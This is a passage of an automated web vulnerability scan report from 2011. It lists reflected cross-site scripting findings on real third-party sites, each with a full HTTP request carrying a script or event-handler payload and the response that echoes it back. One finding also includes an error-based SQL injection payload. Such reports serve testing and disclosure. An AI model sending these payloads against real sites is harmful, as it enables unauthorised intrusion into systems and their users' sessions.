Set-Cookie: anj=Kfu=8fG5+^ErkX00s]#%2L_'x%SEV/i#-Z[4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`?^BL$+7#i$pT[s3jed7tfA1`pEJi?I'cetE@w$C=m_FErWsLkh?FBhA1/nWX9nBJjakYDtOsm*%>P1iWYn<C566r^)=`aZspsOeXr[Az(5mYHslaBH24%8e!G9^o8qHu1d<wou'>X:8EqWdzVt2pM8f4+c0KOudMU-dso+zUvs)2CF+[(.(>y<]pD>][8NX.G>S>V7j*s_)x:*q=s36MWy?D-?d]@6n3)XNf!R#M(IK'+%WGSupCXe=?5wnabP%erqPAShL[Uy0[f]+>:LCj1ySu%)*-+(fM0+(qUzu:>+s*?ID=v0CO9q79tdlePQ[@TNKu[vnkf?@DNFXWGQNZq=1iuS3DC; path=/; expires=Sun, 24-Jul-2011 14:24:28 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 25 Apr 2011 14:24:28 GMT
Content-Length: 1529

document.write('<scr' + 'ipt language=\"Javascript\"><!--\n amgdgt_p=\"5112\";\n amgdgt_pl=\"bca52e1b\"; \n amgdgt_t = \"i\";\n amgdgt_clkurl = \"http://ib.adnxs.com/click/H4XrUbgeA0AfhetRuB4DQAAA
...[SNIP]...
r0bSsYda6b2ziUhg7VNAAAAAC8hAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAJ_Ck8AhwQBAgUCAAQAAAAAfyWMQQAAAAA./cnd=!0xVmYQj25QIQxskKGAAg0ccBKE8xAAAAwMzMCEBCEwgAEAAYACABKP7__________wFIAFAAWP8UYABolgU.4615b'-alert(1)-'2e372cc3b5e/referrer=http%3A%2F%2Fgames.webalta.ru%2F/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DB2DbrIIO1TeCtIcfMsQevr63kDdfq-NMBn6CU7BjbxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2Nh
...[SNIP]...
6.28. http://kronos.tt.omtrdc.net/m2/kronos/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kronos.tt.omtrdc.net
Path:   /m2/kronos/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 48696<script>alert(1)</script>25fc46847c1 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/kronos/mbox/standard?mboxHost=www.kronos.com&mboxSession=1303738433760-48782&mboxPage=1303739507367-90386&screenHeight=1200&screenWidth=1920&browserWidth=1125&browserHeight=981&browserTimeOffset=-300&colorDepth=16&mboxCount=1&param1=test%2Cparam2%3Dtest&mbox=Button_cta_right_rail48696<script>alert(1)</script>25fc46847c1&mboxId=0&mboxTime=1303721507457&mboxURL=http%3A%2F%2Fwww.kronos.com%2Fkronos-site-usage-privacy-policy.aspx&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: kronos.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.kronos.com/kronos-site-usage-privacy-policy.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 216
Date: Mon, 25 Apr 2011 13:56:09 GMT
Server: Test & Target

mboxFactories.get('default').get('Button_cta_right_rail48696<script>alert(1)</script>25fc46847c1',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1303738433760-48782.17");
6.29. http://kroogy.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 286d0<img%20src%3da%20onerror%3dalert(1)>5a8dc7282d8 was submitted in the REST URL parameter 1. This input was echoed as 286d0<img src=a onerror=alert(1)>5a8dc7282d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /favicon.ico286d0<img%20src%3da%20onerror%3dalert(1)>5a8dc7282d8 HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303658380.5.3.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=221607367.144172721.1303647943.1303658380.1303738749.6; __utmc=221607367; __utmb=221607367.1.10.1303738749

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2134

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Favicon.ico286d0<img src=a onerror=alert(1)>5a8dc7282d8Controller</strong>
...[SNIP]...
6.30. http://learn.shavlik.com/shavlik/index.cfm [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.shavlik.com
Path:   /shavlik/index.cfm

Issue detail

The value of the h request parameter is copied into an HTML comment. The payload 41f63--><script>alert(1)</script>cd0802b0b7c was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shavlik/index.cfm?m=521&pg=372&h=041f63--><script>alert(1)</script>cd0802b0b7c&hp=372 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=799534; CFTOKEN=57697702; __utmz=225610631.1303732848.1.1.utmgclid=CPC_jKTPt6gCFUh-5QodsROzEA|utmccn=PatchManagement|utmcmd=(not%20set)|utmctr=vulnerability%20management; __utma=225610631.313706594.1303732848.1303732848.1303732848.1; __utmc=225610631; __utmb=225610631.13.10.1303732848

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 12:47:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


                                                                       
...[SNIP]...
<!-- 041f63--><script>alert(1)</script>cd0802b0b7c|372 -- -->
...[SNIP]...
6.31. http://learn.shavlik.com/shavlik/index.cfm [m parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.shavlik.com
Path:   /shavlik/index.cfm

Issue detail

The value of the m request parameter is copied into the HTML document as plain text between tags. The payload 29f68<img%20src%3da%20onerror%3dalert(1)>8c4ff1d7709 was submitted in the m parameter. This input was echoed as 29f68<img src=a onerror=alert(1)>8c4ff1d7709 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /shavlik/index.cfm?m=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(SELECT%20@@VERSION)%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))29f68<img%20src%3da%20onerror%3dalert(1)>8c4ff1d7709&pg=697&h=0&hp=697&utm_term=vulnerability%20management&utm_campaign=PatchManagement&utm_mt=e&gclid=CPC_jKTPt6gCFUh-5QodsROzEA HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: learn.shavlik.com
Cookie: CFID=799689; CFTOKEN=67476078
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 25 Apr 2011 12:26:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


                                                                                           
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '29f68<img src=a onerror=alert(1)>8c4ff1d7709 AND DMMESSAGE.userCompanyID = 21
' at line 7
</font>
...[SNIP]...
6.32. http://mbox5.offermatica.com/m2/netsuite/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mbox5.offermatica.com
Path:   /m2/netsuite/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 7a431<script>alert(1)</script>ce4081a25f0 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/netsuite/mbox/standard?mboxHost=www.netsuite.com&mboxSession=1303736347554-914602&mboxPC=1303736347554-914602.17&mboxPage=1303742451474-635361&mboxCount=1&mbox=overall_conversion_tracking-mbox7a431<script>alert(1)</script>ce4081a25f0&mboxId=0&mboxURL=http%3A//www.netsuite.com/portal/page_not_found.shtml&mboxReferrer=http%3A//www.netsuite.com/pages/portal/page_not_found.jspinternal%3DT&mboxVersion=28 HTTP/1.1
Host: mbox5.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/page_not_found.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 146
Date: Mon, 25 Apr 2011 15:18:18 GMT
Server: Test & Target

mboxFactoryDefault.get('overall_conversion_tracking-mbox7a431<script>alert(1)</script>ce4081a25f0',0).setOffer(new mboxOfferDefault()).activate();
6.33. http://mbox9e.offermatica.com/m2/eset/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mbox9e.offermatica.com
Path:   /m2/eset/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 221f6<script>alert(1)</script>458371fa13e was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/eset/mbox/standard?mboxHost=www.eset.com&mboxSession=1303736347554-914602&mboxPage=1303736347554-914602&mboxCount=1&mbox=mbx_store_con221f6<script>alert(1)</script>458371fa13e&mboxId=0&mboxTime=1303718347701&mboxURL=http%3A%2F%2Fwww.eset.com%2Fus%2Fstore&mboxReferrer=http%3A%2F%2Fwww.eset.com%2Fus%2Fbusiness%2Fproducts&mboxVersion=37 HTTP/1.1
Host: mbox9e.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 209
Date: Mon, 25 Apr 2011 13:00:35 GMT
Server: Test & Target

mboxFactories.get('default').get('mbx_store_con221f6<script>alert(1)</script>458371fa13e',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1303736347554-914602.17");
6.34. http://ok.mail.ru/cookie-token.do [client_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ok.mail.ru
Path:   /cookie-token.do

Issue detail

The value of the client_id request parameter is copied into the HTML document as plain text between tags. The payload fa439<script>alert(1)</script>b93be018b2a was submitted in the client_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cookie-token.do?client_id=247552fa439<script>alert(1)</script>b93be018b2a&remove=true HTTP/1.1
Host: ok.mail.ru
Proxy-Connection: keep-alive
Referer: http://odnoklassniki.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: JSESSIONID=CBEE3BB859A85F56E2B5BB4ED4C1D0AC; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Content-Length: 243
Date: Mon, 25 Apr 2011 14:35:03 GMT
Connection: close

<html>

<head>
</head>
<body>
Failed to convert value of type [java.lang.String] to required type [long]; nested exception is java.lang.NumberFormatException: For input string: "247552fa439<script>alert(1)</script>b93be018b2a"
</body>
...[SNIP]...
6.35. http://ok.mail.ru/cookie-token.do [remove parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ok.mail.ru
Path:   /cookie-token.do

Issue detail

The value of the remove request parameter is copied into the HTML document as plain text between tags. The payload 39088<script>alert(1)</script>7c14da063e7 was submitted in the remove parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cookie-token.do?client_id=247552&remove=true39088<script>alert(1)</script>7c14da063e7 HTTP/1.1
Host: ok.mail.ru
Proxy-Connection: keep-alive
Referer: http://odnoklassniki.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: JSESSIONID=A90368686F081A1B6C976FE1037576C9; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Content-Length: 251
Date: Mon, 25 Apr 2011 14:35:13 GMT
Connection: close

<html>

<head>
</head>
<body>
Failed to convert value of type [java.lang.String] to required type [boolean]; nested exception is java.lang.IllegalArgumentException: Invalid boolean value [true39088<script>alert(1)</script>7c14da063e7]
</body>
...[SNIP]...
6.36. http://pixel.fetchback.com/serve/fb/pdc [name parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The value of the name request parameter is copied into the HTML document as plain text between tags. The payload d41e8<x%20style%3dx%3aexpression(alert(1))>15991bc29e6 was submitted in the name parameter. This input was echoed as d41e8<x style=x:expression(alert(1))>15991bc29e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /serve/fb/pdc?cat=&name=landingd41e8<x%20style%3dx%3aexpression(alert(1))>15991bc29e6&sid=719 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/page_not_found.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1303696672_1660:517000; uid=1_1303696672_1303179323923:6792170478871670; kwd=1_1303696672; sit=1_1303696672_2451:5100:0_3236:163063:162945_782:517349:517000; cre=1_1303696672; bpd=1_1303696672; apd=1_1303696672; scg=1_1303696672; ppd=1_1303696672; afl=1_1303696672

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:14:10 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: cmp=1_1303744450_1660:564778; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/
Set-Cookie: uid=1_1303744450_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/
Set-Cookie: kwd=1_1303744450; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/
Set-Cookie: sit=1_1303744450_2451:52878:47778_3236:210841:210723_782:565127:564778; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/
Set-Cookie: cre=1_1303744450; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/
Set-Cookie: bpd=1_1303744450; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/
Set-Cookie: apd=1_1303744450; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/
Set-Cookie: scg=1_1303744450; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/
Set-Cookie: ppd=1_1303744450; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/
Set-Cookie: afl=1_1303744450; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 25 Apr 2011 15:14:10 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91

<!-- campaign : 'landingd41e8<x style=x:expression(alert(1))>15991bc29e6' *not* found -->
6.37. http://pl.yumenetworks.com/dynamic_preroll_playlist.fmil [height parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pl.yumenetworks.com
Path:   /dynamic_preroll_playlist.fmil

Issue detail

The value of the height request parameter is copied into the HTML document as plain text between tags. The payload ac54b<script>alert(1)</script>be10ff58fe0 was submitted in the height parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dynamic_preroll_playlist.fmil?domain=133BeuXuCot&width=480&height=360ac54b<script>alert(1)</script>be10ff58fe0&imu=medrect&sdk_ver=1.8.1.2&embedAutoDetect=false&sdk_url=http%3A%2F%2Fxs%2Emochiads%2Ecom%2Fstatic%2Fglobal%2Flib%2F HTTP/1.1
Host: pl.yumenetworks.com
Proxy-Connection: keep-alive
Referer: http://games.mochiads.com/c/g/moon-volley/mvolley.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:54:19 GMT
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Set-Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA; Domain=.yumenetworks.com; Expires=Sat, 29-Feb-2020 07:59:59 GMT; Path=/
YmRmHdr: @RM153_1_232
Set-Cookie: ymdt=0rO0ABXcSAAAEugAAA34AAQAAAOi7eGFI; Domain=.yumenetworks.com; Expires=Sat, 04-Jun-2011 14:54:19 GMT; Path=/
YmDtHdr: @DT_GU
Ypp: @YP_1_1;46718_21626
Set-Cookie: ymf=null; Domain=.yumenetworks.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ymvw=173_193_214_243_JmFVc7buonLLfA; Domain=.yumenetworks.com; Expires=Wed, 03-Aug-2011 14:54:19 GMT; Path=/
Content-Type: application/smil
Content-Length: 3140
P3P: policyref="http://ads.yumenetworks.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Connection: close

<smil xmlns:yume="http://www.yumenetworks.com/resources/smilextensions" yume:refresh_time="0" yume:stagger_time="0" >
<head>
<layout>
<root-layout id="main" width="480" height="360ac54b<script>alert(1)</script>be10ff58fe0" background-color="black" />
...[SNIP]...
6.38. http://pl.yumenetworks.com/dynamic_preroll_playlist.fmil [width parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pl.yumenetworks.com
Path:   /dynamic_preroll_playlist.fmil

Issue detail

The value of the width request parameter is copied into the HTML document as plain text between tags. The payload 8df88<script>alert(1)</script>a5595a30893 was submitted in the width parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dynamic_preroll_playlist.fmil?domain=133BeuXuCot&width=4808df88<script>alert(1)</script>a5595a30893&height=360&imu=medrect&sdk_ver=1.8.1.2&embedAutoDetect=false&sdk_url=http%3A%2F%2Fxs%2Emochiads%2Ecom%2Fstatic%2Fglobal%2Flib%2F HTTP/1.1
Host: pl.yumenetworks.com
Proxy-Connection: keep-alive
Referer: http://games.mochiads.com/c/g/moon-volley/mvolley.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:54:09 GMT
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Set-Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA; Domain=.yumenetworks.com; Expires=Sat, 29-Feb-2020 07:59:59 GMT; Path=/
YmRmHdr: @RM153_1_232
Set-Cookie: ymdt=0rO0ABXcSAAAEugAAA34AAQAAAOi7eGFI; Domain=.yumenetworks.com; Expires=Sat, 04-Jun-2011 14:54:09 GMT; Path=/
YmDtHdr: @DT_GU
Ypp: @YP_1_1;46718_21628
Set-Cookie: ymf=null; Domain=.yumenetworks.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ymvw=173_193_214_243_0ZcJJ0MjgsoTEf; Domain=.yumenetworks.com; Expires=Wed, 03-Aug-2011 14:54:09 GMT; Path=/
Content-Type: application/smil
Content-Length: 3140
P3P: policyref="http://ads.yumenetworks.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Connection: close

<smil xmlns:yume="http://www.yumenetworks.com/resources/smilextensions" yume:refresh_time="0" yume:stagger_time="0" >
<head>
<layout>
<root-layout id="main" width="4808df88<script>alert(1)</script>a5595a30893" height="360" background-color="black" />
...[SNIP]...
6.39. http://playaudiomessage.com/play.asp [f parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://playaudiomessage.com
Path:   /play.asp

Issue detail

The value of the f request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6753b"><script>alert(1)</script>01ca021f355 was submitted in the f parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /play.asp?m=535240&f=ESQGHH6753b"><script>alert(1)</script>01ca021f355&ps=13&c=FFFFFF&pm=2&h=25 HTTP/1.1
Host: playaudiomessage.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 25 Apr 2011 19:54:35 GMT
ServerID: 52
P3P: "CP=\"IDC CSP DOR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT\""
Content-Length: 1121
Content-Type: text/html
Set-Cookie: ASPSESSIONIDASCRBCAQ=DIKOABGBKGEKNEJLMDIIOOBO; path=/
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">

<title>InstantAudioPlayer</title>

...[SNIP]...
<PARAM name="movie" value="http://click-here-to-listen.com/players/iaPlay13.swf?x=2108535240ESQGHH6753b"><script>alert(1)</script>01ca021f355">
...[SNIP]...
6.40. https://secure.trust-guard.com/ResetPassword.php [txtEmail parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.trust-guard.com
Path:   /ResetPassword.php

Issue detail

The value of the txtEmail request parameter is copied into the HTML document as plain text between tags. The payload b5145<script>alert(1)</script>f50696de753 was submitted in the txtEmail parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /ResetPassword.php HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
Referer: https://secure.trust-guard.com/ResetPassword.php
Cache-Control: max-age=0
Origin: https://secure.trust-guard.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147269874.1166530582.1303748966.1303748966.1303748966.1; __utmc=147269874; __utmb=147269874.7.10.1303748966; PHPSESSID=rphnh41r6qngg9nd1ml443go23
Content-Length: 112

txtEmail=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert%280x0000CB%29%3C%2Fscript%3Eb5145<script>alert(1)</script>f50696de753&btnSubmit=Submit

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:42:19 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
